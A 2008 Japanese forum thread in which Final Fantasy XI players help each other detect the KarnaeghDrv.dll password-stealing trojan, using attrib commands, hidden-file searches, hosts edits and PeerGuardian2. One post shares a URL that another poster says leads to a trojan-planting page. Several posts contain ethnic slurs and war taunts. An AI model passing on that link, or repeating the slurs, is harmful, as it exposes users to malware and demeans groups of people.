罠ファイルはリンク切れ?
WHOISはいつもの福建竜岩、5月登録だが今のところリネ資料室には載っていない。

/のソースが興味深い、テキストで色々URLがかかれているのでソースチェッカーで覗いて見る事お勧め。

実際アクセスして中を覗くとrar圧縮のトロイかな?幾つかあるね。

気をつけてくれよな!
474既にその名前は使われています:2008/08/16(土) 09:50:02 ID:xXTkqh5W
>>461
そのコマンドなんですが、>>17の(2)のように
attrib %SystemRoot%\system32\KarnaeghDrv.dll /s -s -h -r
じゃダメなのですか?
このコマンドだと存在しない事になってますが、461さんのだと無反応、、という事は
system32以外のフォルダにKarnaeghDrv.dllが存在しているって事でしょうか?
475既にその名前は使われています:2008/08/16(土) 09:54:13 ID:bgfTFsLF
無反応って?
476既にその名前は使われています:2008/08/16(土) 09:57:23 ID:pZXAGyGR
>>473
これは酷いな
www.uploda.org/uporg1612457.jpg.html
aguseで取得したSSうpしてみた
477既にその名前は使われています:2008/08/16(土) 09:57:56 ID:AULPU5KE
>>475
そのドライブにいなければ「ファイルは存在しません」
何も表示されず次のコマンド受付状態になればどこかにいる
どこにいるか知りたければ
attrib c:\KarnaeghDrv.dll /s
(c:\は見つかったドライブ)
これでファイルのパスが表示される
478既にその名前は使われています:2008/08/16(土) 10:07:57 ID:1Gm/eMj2
>>449
一旦システムの復元をすべて無効にすれば消える。
479既にその名前は使われています:2008/08/16(土) 10:10:45 ID:xXTkqh5W
>>475
attrib c:\KarnaeghDrv.dll /s -s -h -r
こちらのコマンドだとコマンドプロンプトでは何も表示されずに
attrib %SystemRoot%\system32\KarnaeghDrv.dll /s -s -h -r
こちらだとファイルは存在しませんと出たので、、、という事でした。
>>477
attrib c:\KarnaeghDrv.dll /s
では、ファイルが見つかりません -C:\KarnaeghDrv.dll
という事だったので、、、とりあえずこの方法の調べ方ではCドライブに存在してないっぽい
って事で良いのでしょうか
480既にその名前は使われています:2008/08/16(土) 10:12:33 ID:bgfTFsLF
>>477
そういうことか!ありがとう
存在する場合はどう表示されるのか知らなかった
481既にその名前は使われています:2008/08/16(土) 10:14:03 ID:qWc24VrS
実際、一日にどれくらい被害がでてるんだ?、とりあえず、俺が1w
スクエニは把握してるだろうから、いろんな情報を出して、もっと注意を喚起すべき

潜在的にはハックされてもおかしくない人が山ほどいて、業者がハックしきれない
ような気がするんだが
482既にその名前は使われています:2008/08/16(土) 10:14:14 ID:AULPU5KE
>>463
消えた理由の推測
1、勝手に消えた
2、違う名前になった
3、使用中のアンチウィルスソフトが対応して、自動的に隔離もしくは削除された
4、ウィルスにレジストリを改変されて>>459のやり方でも隠しファイルが見えないようにされた
(この場合attribコマンドならいるかどうか調べられる)
483既にその名前は使われています:2008/08/16(土) 10:34:19 ID:AULPU5KE
>>479
attribコマンドはattrib /?ってして貰えば分かるけど
ファイルの属性を表示または変更するコマンド
attrib c:\KarnaeghDrv.dll /s はCドライブにKarnaeghDrv.dllがいる限りファイルパスを返してくるので
それで見つかりません表示ならCドライブにはいないことになる
484既にその名前は使われています:2008/08/16(土) 10:44:38 ID:o0PTecta
MMO無関係者、スイーツ共やセキュリティに無関心な奴ら、企業や官公庁あわせると
潜在的には物凄い人数が感染してそうな・・・。
MMOのIDやPASS以外の個人情報抜かれるよう仕掛けられていたら、えらいことだ。
485既にその名前は使われています:2008/08/16(土) 10:55:10 ID:dz6Jb4XX
>481
どうなんだろうね、俺の周りには全然被害者いないが
486既にその名前は使われています:2008/08/16(土) 11:07:45 ID:ql77kMIR
>>481
最盛期に業者のデータサーバに田代しかけた人がいて、
その時に覗いた時は1日で約500件ほどID・パスデータが蓄積されていたらしい。
同種のパス抜きトロイのデータ送り先は2ヶ所あったので、単純計算で1000件/日。
複合パス抜きだったり同じユーザーが複数回引っかかったりで有効?実数はもう少し下がるだろうけど。

でもって連中はこれをリスト化して順次処理してると思われるので
(7月に猛威を振るったトロイの起こす「ハックの兆候」から実被害まで1週間〜1ヶ月程ラグがあった)
「1日」の被害実数は業者の処理可能なキャパシティ以上には増えないだろうけど、
潜在的被害者(処理待ち)は日に日に増えていってるんじゃないのかな。
487既にその名前は使われています:2008/08/16(土) 11:14:11 ID:zwbDNz9z
名前まで知ってんのは1人だけだな
子供生まれるっつー理由で空LS脱退したくせに輪をかけて廃プレイに勤しんでた女
巻き戻してもらったらしいが
子供のためにももう一回ハックされて引退したほうがいいんでないかな…w
488既にその名前は使われています:2008/08/16(土) 11:19:02 ID:o50p2CZf
attrib c:\KarnaeghDrv.dll /s って表示されるまでちょっと時間かかるんだね。


489既にその名前は使われています:2008/08/16(土) 11:21:16 ID:AULPU5KE
>>488
ファイル検索が表示まで時間がかかるのと同じ事だよ
490既にその名前は使われています:2008/08/16(土) 11:54:14 ID:Z7u4VtkH
FFはPS2でFF系ブログはPCなんて人も結構居るから、罠にはまった数=有効垢ハック被害者
ではないとは思うけど、業者は新たに罠張って1ヶ月くらいは入れ食い状態だろうね。
一番の問題は、サイバー犯罪は中国国内からであれば全てセーフという現実。
日本と中国の間に犯罪人引き渡し条約はない、日本はアメリカと韓国のみだっけ?

かと言って中国と条約を相互締結すればいい、って問題でもないんよね。
例えば、無実の日本国民を中国が「でっちあげ」の罪状で引き渡し請求する、するとどうなるか。
罪があるかも怪しい自国民を、日本政府は中国司法当局に引き渡すことになる、その方が大問題。
政治とか司法ってのは難しいねぇ、てか民主国家でもないのに国連常任理事国で、マンパワーも
経済成長も桁外れの大国=中国だから、アメリカですら派手に敵対できない国だからねぇ・・・
491既にその名前は使われています:2008/08/16(土) 11:56:54 ID:yUp0prid
世界中の政府機関に時間かけて同胞を潜り込ませてきた中国に死角なし
492既にその名前は使われています:2008/08/16(土) 11:57:09 ID:U22SFD1Y
中国潰せばいいのにな。せんそーだーーー!
493既にその名前は使われています:2008/08/16(土) 11:59:45 ID:+o1kzlZb
>>490
運営、と言うかsagesundiが張ったリンクシェルコミュニティβという罠は酷かったな。

中国は・・・困ったな。
日本がどうにか出来る最大のチャンスを永遠に失ってしまったからな。
予言されているアジアの大地震もなんだか日本に直撃しそうな悪寒がするし、
それが中国、南北朝鮮で起こってくれればいいのだけれど・・・

かの国共は日本で起こったら大喜びで支援という名目で軍隊送り出してし
日本全土を実効支配するつもりだろうな・・・
494既にその名前は使われています:2008/08/16(土) 12:00:49 ID:bgfTFsLF
>>492
冗談でも言っていいことと悪いことがあるよ
495既にその名前は使われています:2008/08/16(土) 12:08:44 ID:qmwBd4Ez
>>494
むしろお前みたいなのはネ実こないほうがいい
496既にその名前は使われています:2008/08/16(土) 12:17:19 ID:iIeM2Uhf
>>481
FFだけじゃなくて複合ウィルス、しかもMixiやLineageやらROも入れたら
物凄い数になるんじゃねーのかな。
PG2で使ってるブロックリストだって元はLineageのパス抜き対策用だしな。
497既にその名前は使われています:2008/08/16(土) 12:28:32 ID:Z7u4VtkH
中国も時間が経てば民主化に向かう、ただ劇的な変化は見込めない、すっごく時間が必要。
今の大国を維持するには諸外国や大国との国交は必須、間違っても国境超えて戦争なんて
起こせない、だからチベット辺りで満足する、越境戦争はどう考えても自滅行為。
日本も日米安保があるから、日本本土への攻撃はアメリカ本土への攻撃に値する、テラ安全。

問題は中国の御国事情、社会も経済も成熟していない今の状況で民主化なんてしたら、
間違いなく真っ先に全力で日本を攻め始める、それが諸外国やアメリカを敵に回すとしても
後先なんて考えない、それが現実、米軍が核落とすまでやめない、落としてもやめないかも、
だから中国には緩やかに変革してもらうしかない。
むしろ中国政府が国民を押さえきれない節のある昨今、クーデターでも起こったら周りの国が
マジヤバイ、超ヤバイ、メタミドホスなんてレベルじゃない、肉まん割ったら具が無いくらいヤバイ。
498既にその名前は使われています:2008/08/16(土) 12:33:32 ID:Z/TjMW/M
政治的主張したい奴はどっか行けよ
499既にその名前は使われています:2008/08/16(土) 12:34:19 ID:vgQ22Ts5
日本攻撃されたら世界のオタが怒るんだろうな・・・・
いや・・・だからなに?言われても困るけど・・・
500既にその名前は使われています:2008/08/16(土) 12:41:09 ID:3n0ccyNC
カスペとかノートンとかのオプション推奨設定みたいなのテンプレに追加希望
501既にその名前は使われています:2008/08/16(土) 12:42:27 ID:U6vHJC0Z
中国に変化を望むのは無駄でございます
我々ができるのは被害届けを出すこと、これに尽きます
あと、日本人のRMT卸売業者もどうにかできればいいんだけど
ネット関連の法整備が急がれるねぇ
502既にその名前は使われています:2008/08/16(土) 12:43:06 ID:L0+o34Vd
>日本も日米安保があるから、日本本土への攻撃はアメリカ本土への攻撃に値する、テラ安全。

スレチだが言っちゃうぜ
安保を妄信してはいけない
アメリカは現実主義の国
日本を守ることが、リスクに比べてアメリカの国益が少ないと判断すれば
「やっぱ日本守るのやーめたw アメリカ人の血を日本のために流す道理はねーべ ていうか自分の国くらい自分で守れやボゲ」
で静観するだけ

日本国民は自分できちんと軍隊を持って自国を守るという
国家としての基本原則を忘れてしまったのが問題
503既にその名前は使われています:2008/08/16(土) 12:44:14 ID:xXTkqh5W
>>483
なるほど、そうでしたか、ありがとうございますm(_ _)m
504既にその名前は使われています:2008/08/16(土) 12:58:58 ID:3KKW40Ku
いまやRMT市場はマネーロンダリングの手段になりつつあるね
893が裏で手を出し始めてるだろう
505既にその名前は使われています:2008/08/16(土) 12:59:18 ID:uIll6Kqy
裏だの空だの入っているヤツなら、ハック被害者2、3人は聞くくらいのレベルかな、今は。

506既にその名前は使われています:2008/08/16(土) 14:06:32 ID:DzlgalHj
■「KarnaeghDrv.dll」
ってFF11だけじゃなくて信オンのパスも抜ける?
FTPのパスも抜けたりする?
507既にその名前は使われています:2008/08/16(土) 14:14:06 ID:1Qzgm2CV
>>506
信オンは抜かれるんじゃなかったかな
508既にその名前は使われています:2008/08/16(土) 14:32:34 ID:OQt+IQup
>>506
他に抜かれるゲームがまとめられてるとこないかな?
509既にその名前は使われています:2008/08/16(土) 14:53:02 ID:+FQOyp5w
>>492
中国自体は戦力も並み程度の雑魚だが数の暴力が怖いんだぜ?
エリート兵1人に対し100人の雑兵が一気にかかってくるからマジで怖い
510既にその名前は使われています:2008/08/16(土) 14:57:32 ID:AgQhz05J
フォルダオプションをいじってカスペルスキーで完全スキャンして検知無しだったのですが、
コマンドプロンプトにattrib c:\KarnaeghDrv.dll /sを入れても
ファイルが見つかりません。存在しません。が出ません。
これはまだ存在しているという事なのでしょうか?
511既にその名前は使われています:2008/08/16(土) 15:22:18 ID:0TDZDaBV
>>510
コマンドでの検索だと、なにも表示されなかったりする例が前にもありました
環境によって表示が異なる可能性もありますから、普通にExplorerで検索して
みてください(↓の設定を忘れずに)

■「KarnaeghDrv.dll」がPCに存在するか調べる方法
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。
512既にその名前は使われています:2008/08/16(土) 15:39:59 ID:AgQhz05J
>>511
ありがとうございます。
検索してみた所何も見つかりませんでした。
パソコンには疎くて不安だったのでとても助かりました。
513既にその名前は使われています:2008/08/16(土) 15:59:49 ID:AULPU5KE
OSがVistaとかだとattribの挙動が違うのかな?
514既にその名前は使われています:2008/08/16(土) 16:30:47 ID:xXTkqh5W
>>513
IDで分かると思いますけど、Vistaでは自分のカキコした感じでしたね。
attrib c:\KarnaeghDrv.dll /s
ではいちよう、「ファイルは存在しません」って出てました。
515既にその名前は使われています:2008/08/16(土) 16:48:22 ID:TEYExc6O
つうかKarnaeghDrv.dll をどこで拾ってきたのか本当に記憶がない、、、
運が悪かったとしかいえんな、、、、
516既にその名前は使われています:2008/08/16(土) 17:03:17 ID:1iHCODHu
>>509
それなんてBETA?
517既にその名前は使われています:2008/08/16(土) 17:14:26 ID:rN2j6TLi
戦車級ですねわかります
518既にその名前は使われています:2008/08/16(土) 17:16:53 ID:AgQhz05J
語句KarnaeghDrv.dllを含めて検索したら2件かかりました・・。
まだ検索途中なのですがこれは削除してしまったほうがいいのでしょうか・・
519既にその名前は使われています:2008/08/16(土) 17:23:37 ID:BHhJcwZ0
>>518
ウィルスのおおもとが残ってますね
何度消しても同じように再生してくると思います
クリーンインストールしてリカバリーされたほうがいいでしょう
520既にその名前は使われています:2008/08/16(土) 17:27:45 ID:2qdNihrv
カスペ重いよ・・・・
ノートンも重かった
はーハイスペックPC買わなきゃダメかなー
住みづらい世の中になりました。
521既にその名前は使われています:2008/08/16(土) 17:28:35 ID:AgQhz05J
>>519
なるほど・・カスペルスキーを信用しすぎて既にアカウントの復旧を申し込んでしまったので
もう手遅れかもしれないです・・
復旧完了メールが来るまでにクリーンインストールをして、
メールが届き次第パス変更をしてみようと思います。
ありがとうございました。
522既にその名前は使われています:2008/08/16(土) 18:45:04 ID:AULPU5KE
>>514
ファイル属性の変更するときのattribの正しい構文は
attrib -R -S -H C:\○○ /S だけど
XPだと
attrib c:\○○ /s -s -h -r でも問題なかったりする
Vistaとかだと正しい方じゃないと動かないとかかも知れない
523既にその名前は使われています:2008/08/16(土) 19:50:57 ID:jKCVKL5/
埼玉人なんだが
なぜか新潟簡易裁判所から
特別送達とやらがきた
正確には不在通知だが
交通違反で呼び出されるはずねーし
(半年以上前に一方通行でつかまったくらい)
会社関係か?と思ってもそもそも新潟に関係などない
ヤフオクのトラブルでいきなり訴訟ふっかけてくる奴いないだろうし
ありえるのは小額訴訟詐欺
まさかハックで獲得した個人情報を
中華が日本の詐欺グループに売っている??
524既にその名前は使われています:2008/08/16(土) 20:01:49 ID:Z/TjMW/M
何の呼び出しだか判明してから書けよw
525既にその名前は使われています:2008/08/16(土) 20:03:18 ID:/vtq2LR9
PC換えたからまっさきにカスペとPG2入れようとしたら
PG2日本語版の実行ファイルリンク切れてるし
526既にその名前は使われています:2008/08/16(土) 20:09:52 ID:ppkBeJKd
>>525
>>15
なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください

とは違う?
527既にその名前は使われています:2008/08/16(土) 20:11:00 ID:jtW7odQo
前スレで仮想環境どれが良いのかって質問があった気がするのでメモ。

・VMWare 
  基本的に有料
  無料な物や、無料で使う方法もあるが、ちょっと手数が必要。つまり導入がめんどい
  テスト段階だが、DirectXも利用できる(軽いMMOレベルなら動かせる)
  USB 2.0対応
  ホスト、ゲストをあまり選ばない

・VirtualBox
  無料、最新版はWinXP以降
  USB2.0対応、DirectX未対応
  ホスト、ゲストをあまり選ばない

・VirtualPC
  無料、最新版はWinXP以降
  USBは使えないと見たほうが楽、DirectX未対応
  ホストはWindows限定。ゲストもWindows系以外はうまく動かないことがある

個人的にはVirtualBoxが無難かと。
528既にその名前は使われています:2008/08/16(土) 20:18:29 ID:Ce3TWb7L
被害にあって全部補償されると勘違いしてるバカは下みとけ

ttp://www.jcp.or.jp/akahata/aik07/2008-08-15/2008081501_01_0.html
529既にその名前は使われています:2008/08/16(土) 20:39:55 ID:Z/TjMW/M
アレなのがファビョりだすから政党機関紙は貼るなよ
530既にその名前は使われています:2008/08/16(土) 20:43:06 ID:jKCVKL5/
すまねー
まったく別件
ヤフオクの話ですた
すげーヤクザみたいな相手が
欠品してるもんがあるぞゴルァ
自分は法関係の知人がたくさんいるぞと脅して
訴状送ってきただけですた
あまりにも脅しな文章書くのでみてなかった
531既にその名前は使われています:2008/08/16(土) 20:49:46 ID:Z/TjMW/M
532既にその名前は使われています:2008/08/16(土) 20:51:46 ID:7O1T9rAZ
>>530
スレチレスすまそ
訴状ってことは、多分小額訴訟かなんか起こされてるんだと思うが、
どんなDQN相手でも、裁判は放置したら負けて強制執行(給料差し押さえとか)
されるから、気をつけろよ。
どうせ新潟までなんて来るわけねーって思ってる確信犯の可能性高し。
533既にその名前は使われています:2008/08/16(土) 20:54:58 ID:7O1T9rAZ
メールのやりとりとか証拠になるから、ヘッダつけて印刷しとけ。
534既にその名前は使われています:2008/08/16(土) 21:07:15 ID:iIeM2Uhf
>>530
小額訴訟拒否で、通常裁判にしてやれ。
535既にその名前は使われています:2008/08/16(土) 21:08:44 ID:BHhJcwZ0
PG2の日本語版DLについて前スレより

210 :既にその名前は使われています:2008/08/06(水) 22:11:22 ID:qXUrpr6O
WebArchive経由で日本語版落とせるけど
これでいいかな?

211 :既にその名前は使われています:2008/08/06(水) 22:15:04 ID:qXUrpr6O
PG2の日本語版

212 :既にその名前は使われています:2008/08/06(水) 22:28:56 ID:jq6M1t+z
あー 落とせますね 
2008/1/20の落としてみて virustotal.に投げてみたけどだいじょぶそ。
ttp://www.virustotal.com/jp/analisis/492cc86029a51795f4c18d6e352b0803

ttp://web.archive.org/web/20080209171747/ttp://www.dukedog.flnet.org/trans.html
※あちらサイトが使えなくなっている理由・原因はわかりません
 ●部分2ヶ所に h を入れてください
 2008/2/9のデータを上記と同じようにvirustotalに投げて、結果は解析済み以外に
 なにも出ませんでしたので大丈夫です(わたしもこれを使っていて不都合はありません)
536535:2008/08/16(土) 21:10:35 ID:BHhJcwZ0
ページに飛ぶと文字化けしているかもしれませんから、そのときは
エンコードで日本語(自動選択)を選べば解消します
537既にその名前は使われています:2008/08/16(土) 21:25:03 ID:5KXTGrsq
>>530
地元の管轄裁判所への移送手続きと、通常手続移行申立てがお薦めか。
恐喝まがいの少額訴訟提起なら、これが効果的。
538既にその名前は使われています:2008/08/16(土) 21:34:58 ID:tmRDIQD1
頭の悪い小日本人 何をしても無駄 脳足らないし死ね
539既にその名前は使われています:2008/08/16(土) 21:35:22 ID:gJK0bXD+
>>521
いまさらだけど、含むでひっかかったのって
カスぺルのとかspybotのファイルじゃないか??
540525:2008/08/16(土) 21:50:32 ID:/vtq2LR9
>>526
>>535
ありがとう!とりあえず英語版入れてしのいでたけど
入れ直すは。
ただ今無印からアルタナまで計10枚インスコ終わって絶賛VU中。
541既にその名前は使われています:2008/08/16(土) 21:59:05 ID:lxCzswJG
>>528
アカは中華と同類だろ
死ねよ^^;
542既にその名前は使われています:2008/08/16(土) 22:03:24 ID:+mDqdjWk
>>540
火狐+NoScriptも忘れないようにネー
543既にその名前は使われています:2008/08/16(土) 22:11:12 ID:jKCVKL5/
>>532
うん小額訴訟は何もアクション起こさなければ
訴訟したもん勝ちってのは知ってます
一時期架空請求流行ったからね
>>533
やりとりが証拠と言っても
くだらないいちゃもんと思って放置してただけだしなあ
自分の聞いた話ではこういう知人がいるぞとかは脅しになるらしいが
>>534
まあこちらにも落ち度はあるんで
物送ってちょびっと返金
に応じなければこちらもアクション起こすわ

つーかなんでみんな反応してくれるんだwありがとうw
544既にその名前は使われています:2008/08/16(土) 23:51:35 ID:ydC0hN8D
>>543
「暇な人が情報出し合ってー」で構成された、ある意味で投げっぱなしな珍しいスレッドだからなー。ここ。
まあ、役に立つ情報貰えてよかったじゃまいか。
545既にその名前は使われています:2008/08/17(日) 00:27:56 ID:u+7BYvIL
FF11WARNING管理人です。
帰宅しましたのでアクセスのループの件設定を変更しました。
単純にエラーが返るように改善されていると思います。
ご迷惑をおかけして申し訳ありませんでした。
また 超眠いよっぱらいなので乱文となりますことも先にお詫び申し上げます。

帰省中ネットのない環境におりましたので 1039045744:88について
感染の判明しているサイトについてリソースのチェックを行いましたところ
諸般の事情で詳細は書けないのですがXREA側の説明で概ね納得できる状態となりました。
スレやその他のソースを確認のうえ早い時期にまとめてアップする予定ですが
ミラーのほうはmiku.xrea.jp修正から1時間以内には同内容に更新されているはずで
スレテンプレぽいのもミラーリングしてありますので
(スレ流し読みして変更あるようなので一両日中には更新しておきます)
スレ的にはミラーにアクセスしていただくほうがいいかもです。

関連して若干スレチになりますが XREAがサポートフォーラムのphp更新で記述している内容と実際のサーバの設定に齟齬があります。
XREAユーザーの方々には phpinfoの確認を推奨いたします。
おやすみなさい>all
546既にその名前は使われています:2008/08/17(日) 01:18:54 ID:e5W+tY6I
パスワードが簡単に変えられてしまうのは完全にスクエニのミスだよ
普通はパスワード変更の時に生年月日ぐらいは確認する。
547既にその名前は使われています:2008/08/17(日) 01:22:10 ID:zui7K53Q
>>545
夜分ご苦労様です_(._.)_

良い意味で情報発信してる人もいるのに
XREAどうなってんねんヽ(`Д´)ノ

PC使ってる人は各自気をつけましょう(T-T)
548既にその名前は使われています:2008/08/17(日) 01:44:41 ID:Q/CzFlgR
>>546
さすがにパスワード変更の再に誕生日聞くネトゲなんて聞いたことないぞw
大抵は現行パスワードを入れれば変更できるぞ。
549既にその名前は使われています:2008/08/17(日) 01:50:50 ID:WPruVigG
>>548
それお前が無知なだけ
採用してるゲームはかなり多い。
ネカフェからプレイできるゲームの中ではFF11は一番セキュリティーが甘い。
パス盗まれるとクレカまで使われるのはFFぐらい
550既にその名前は使われています:2008/08/17(日) 02:01:26 ID:kYIvJQLe
サイトに罠張られてるってことは11関連のサイトは見ちゃ駄目ってことですか?
要するに攻略は書籍のみにしろと
551既にその名前は使われています:2008/08/17(日) 02:06:46 ID:gtypf241
>>550
FFと全く関係ないサイトでもやられる可能性あり
552既にその名前は使われています:2008/08/17(日) 02:33:32 ID:Q/CzFlgR
>>549
仕事柄いろんなネトゲに触ってるんだが見たことないんだよね・・・
具体的にそれ採用してるネトゲって何がある?
試してみるわ・・・
553既にその名前は使われています:2008/08/17(日) 04:07:26 ID:TU2WoLGz
また江頭かよ・・・
http://panterorr.com/dfsqras.jpg
554既にその名前は使われています:2008/08/17(日) 04:10:01 ID:5+Tq9gvM
一応警告な!
ウラル何でもかんでも踏んじゃダメだぞ!
555既にその名前は使われています:2008/08/17(日) 04:11:05 ID:ts4WOJGA
>>553
ワロタw
556既にその名前は使われています:2008/08/17(日) 04:16:37 ID:TDNvZxbv
553はトロイ仕込まれるページにとばされる。
555みたいなレスを別IDでつけたりマジ悪質だな。
557既にその名前は使われています:2008/08/17(日) 04:28:50 ID:vy91i/27
ニュー速の在日あたりがやらかしてるんじゃないの
江頭ネタで一番速いだろ
558既にその名前は使われています:2008/08/17(日) 05:54:39 ID:O4jKMdzb
Janeでおk
559既にその名前は使われています:2008/08/17(日) 07:00:10 ID:01MmIQoE
>>552
ネトゲに限らず、パスワードの変更時に個人認証するのは当たり前だと思うが
個人認証もせずにパスワード変更する方が異常
仕事柄と言ってるな、そんな程度の低いセキュリティー意識でやってるわけ?
560既にその名前は使われています:2008/08/17(日) 07:00:15 ID:ndqT0NUw
初心者な質問ですみません。
PeerGuardian2を導入しようと思い、テンプレのリネージュ資料室を参考に、hosts変更を試みました。

>メモ帳が開かれるので、一番下の行に「危険URL」にある「hosts追加用」のファイルに記載された設定を
>コピー&ペーストします。

ここがうまくできなくて、ファイルの保存形式が.txtになってしまいます。
なにか見落としがあればご教授お願いします。

ユーザーアカウントはOwnerでコンピュータ管理者権限ありな感じです。
561既にその名前は使われています:2008/08/17(日) 07:21:36 ID:9luk4BkM
よく分からんけど取り合えずパスを変更するときに誕生日を入れるネトゲの名前を列記するべき
話はそれから

つか仮想osにいれるlinuxは何がいいのかのう
日本語使えそうなのでvineとかubuntuとか?
562既にその名前は使われています:2008/08/17(日) 08:11:56 ID:tdUsvM9m
>>560
PG2を導入したいのか、hostsの変更をしたいのか、どっちだ?
563既にその名前は使われています:2008/08/17(日) 08:46:39 ID:3vINh4rh
誕生日は入れるのは知らないが大体のネトゲはメールで本人確認するよな
564既にその名前は使われています:2008/08/17(日) 09:49:04 ID:z6RysaBC
MMOジプシーしてきたが、今までパス変える時なんて
・今までのパス
・新しいパス
しか確認なかったな。
最近のはそうじゃないのかな?
565既にその名前は使われています:2008/08/17(日) 09:52:06 ID:7q/EfF4c
>>561
Ubuntu日本語ローカライズドイメージ

VirtualBox用仮想マシンのダウンロード
http://www.ubuntulinux.jp/products/JA-Localized/virtualbox

VMware用仮想マシンのダウンロード
http://www.ubuntulinux.jp/products/JA-Localized/vmware

>>560
ここを見て勉強。
http://lineage.paix.jp/guide/security/basic-ipfilter.html
IPフィルタを行うには、PG2導入やhosts変更のようにいくつか方法があるって話なので
PeerGuardian2を導入すればhosts変更する必要はない。
566既にその名前は使われています:2008/08/17(日) 09:57:44 ID:eUbFOXMx
なんかKarnaeghDrv.dllをふくむで検索したら
ワトソン先生のファイルがでてき内容みてみたら
結構前からもぐりこまれてたようだorz
567既にその名前は使われています:2008/08/17(日) 10:09:41 ID:X2rhc4LE
>>561
俺はVine,Fedora Core,knoppixとか使ってるかな。
568既にその名前は使われています:2008/08/17(日) 11:10:10 ID:9luk4BkM
ubuntuのfirefox3から書き込みテスト
569既にその名前は使われています:2008/08/17(日) 11:12:40 ID:9luk4BkM
お、いけるね
たまにメモリ不足と怒られるけどw
スレ違いごめんにょ
色々アドバイスあり
570既にその名前は使われています:2008/08/17(日) 11:17:02 ID:DhGA36YM
>>553,>>555
通報しました。逮捕乙
571既にその名前は使われています:2008/08/17(日) 11:17:14 ID:jHwIkWRn
>>523

RMTやってるやつならよくあることだな
他人に住所使われたんだろw
572既にその名前は使われています:2008/08/17(日) 11:21:17 ID:js27fiF3
>>571
うへwやつら顧客情報売ってるのかwwなにそれwww
客の情報バラまくって信じられないが
正規の商売じゃないし何に使われるかわからないもんだな。
573既にその名前は使われています:2008/08/17(日) 11:28:31 ID:U+s0vjdS
893が手を出し始めてるらしいからな。
マネーロンダリングに最適だから。
574既にその名前は使われています:2008/08/17(日) 11:33:57 ID:L7Dh7rTD
ヤフオクで中古のPS2買ったんだが出品者が台湾人くさい名前だったんだが
PS2にウイルスなんてないよな?初期化しようにもナビゲータCDだけ起動しなくて・・・・
誰か詳しい人おしえてください・・・
575既にその名前は使われています:2008/08/17(日) 11:33:59 ID:z6RysaBC
>>572
普通の会社だって顧客情報を一社員が勝手に売ってたりするよ。
DMや電話が来る程度のだったら、どこから自分の情報がいったかわからないしね。
ヤフオクの相手とか、表だって利用してますって言えないRMT業者とかは、
やってると思ってていいぐらい。
576既にその名前は使われています:2008/08/17(日) 11:39:31 ID:bfdz50j7
ルーセントハートは生年月日で確認するな
他のメーカーのネトゲはメール確認する。


何もしないでアカウントが変更できるのは「ファイナルファンタジー11」だけ
577既にその名前は使われています:2008/08/17(日) 11:41:16 ID:cZj0lDoj
>普通の会社だって顧客情報を一社員が勝手に売ってたりするよ。

だから、ムーミン谷だの赤坂御用地だので
スクエニへ住所登録したやつらを俺は笑えないw
578既にその名前は使われています:2008/08/17(日) 11:49:52 ID:z6RysaBC
オンラインで入力すること自体怖いって人もいるだろうしね
579既にその名前は使われています:2008/08/17(日) 12:48:21 ID:wcKO09Zm
ハックされて、レアアイテムの競売取引履歴から業者特定できたんだがw
まあ、復元する気も戻る気もないからどうでも良いんだけど。
580既にその名前は使われています:2008/08/17(日) 12:54:16 ID:rnLnuAyF
>>579
可能なら通報しといたら?
まーそいつもハクられたかLv1の捨てキャラかもしれんが。
581既にその名前は使われています:2008/08/17(日) 13:05:21 ID:sWBE72bZ
今POL起動したらverisign(199.7.54(or51).190)に接続しにいったけど、テンプレにないけど平気だよね?
582既にその名前は使われています:2008/08/17(日) 13:18:37 ID:rnLnuAyF
verisign知らん奴いるのか…?
583既にその名前は使われています:2008/08/17(日) 13:24:59 ID:0sAymbfo
とりあえずググればいいのに
584既にその名前は使われています:2008/08/17(日) 13:39:44 ID:ivm6O+v+
>>579
復元も復帰もはしなくて良いからスクエニに伝えて警察に届けだして><
585既にその名前は使われています:2008/08/17(日) 13:44:43 ID:Q1f1Z/IM
>>576
必死すぎ?
586既にその名前は使われています:2008/08/17(日) 13:55:38 ID:9luk4BkM
ググったらガマニアで吹いた
587560:2008/08/17(日) 14:22:38 ID:ndqT0NUw
>>562
わかりにくい表現になってました。すみません。
サイトでは、PG2導入と、Hostsの変更が紹介されていたため、わかりにくい表現をしてしまいました。
Hostsの変更に関してお伺いしたいです。

ファイル名を指定して実行
notepad %Systemroot%\system32\drivers\etc\hosts

これでHostsがメモ帳で開かれます。
ここで、危険URLの設定を追加編集したところまではいいのですが、
保存の形式がtxt形式でしか保存ができません。
txt形式で保存し、
notepad %Systemroot%\system32\drivers\etc\hosts
を再度おこなうと、編集に失敗しているようでした。
588既にその名前は使われています:2008/08/17(日) 14:28:45 ID:rnLnuAyF
上書き保存するか拡張子削ればいいだろ
589560:2008/08/17(日) 14:45:34 ID:ndqT0NUw
>>588
上書き保存に関してですが、ctrl+s操作するとメモ帳の題名で「!」マークの警告がでます

ファイルC:WINDOWS\syustem32\drivers\etc\hosts を作成できません。
パスおよびファイル名が正しいか確認してしてください

と出ます。その後、OKを押すと名前をつけて保存の操作に自動的に移行します。
保存のファイル名をhostsとしておりますが、ファイルの種類が テキスト文書 (*txt)かすべてのファイルの2択だけ
文字コードはANSIが指定されております。ほかの選択肢にUnicodeやUTF-8などがあるようです。
590既にその名前は使われています:2008/08/17(日) 14:48:40 ID:rnLnuAyF
とりあえずhosts.txtとして保存、hostsを削除してhosts.txtをhostsにリネームでいいんじゃね?
削除できないなら何らかのプロセスがロックしてるんだろう。
あと「メモ帳の使い方」みたいのはPC初心者板かWindows板でやってくれ。
591既にその名前は使われています:2008/08/17(日) 14:50:34 ID:JuDLRLHu
POL→FF11に切り替わるところで
問題が発生したためPol.exeを終了します。
とメッセージが出て起動できないのですが、ただのエラーでしょうか?
PCの再起動をしてもこの症状が出てしまってプレイできません。
POLには普通にログインできるのですが、FF11に切り替わらないです。
592既にその名前は使われています:2008/08/17(日) 14:55:51 ID:rnLnuAyF
>>591
なんとも言えません(ビデオカードやドライバの問題、etc.)。
593既にその名前は使われています:2008/08/17(日) 14:56:28 ID:Dvpxc276
まずはファイルチェックとか
594既にその名前は使われています:2008/08/17(日) 14:57:41 ID:ZNhtwA8S
それもうやばいんじゃねーの?
